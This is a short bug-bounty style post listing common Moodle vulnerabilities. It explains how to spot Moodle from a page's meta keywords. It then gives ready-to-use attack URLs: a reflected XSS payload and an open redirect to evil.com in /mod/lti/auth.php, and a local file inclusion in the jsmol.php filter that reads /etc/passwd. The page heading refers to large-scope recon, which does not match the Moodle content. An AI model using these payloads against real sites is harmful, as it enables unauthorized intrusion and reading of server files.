Home Doing Recon on a Large Scope
Post
Cancel

Doing Recon on a Large Scope

Moodle Common Bugs

Introduction

What would you do if you came across a website that uses Moodle?

How to Detect

If you visit https://target.com and see the source code, you will see <meta name="keywords" content="moodle,

  1. Reflected XSS in /mod/lti/auth.php via “redirect_url” parameter
    1
    
    https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1)
    
  2. Open redirect in /mod/lti/auth.php in “redirect_url” parameter
1
https://target.com/mod/lti/auth.php?redirect_uri=https://evil.com
  1. LFI /filter/jmol/js/jsmol/php/jsmol.php in “query” parameter
1
https://target.com/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd
This post is licensed under CC BY 4.0 by the author.

Proofpoint_Hacktricks

Zend

Comments powered by Disqus.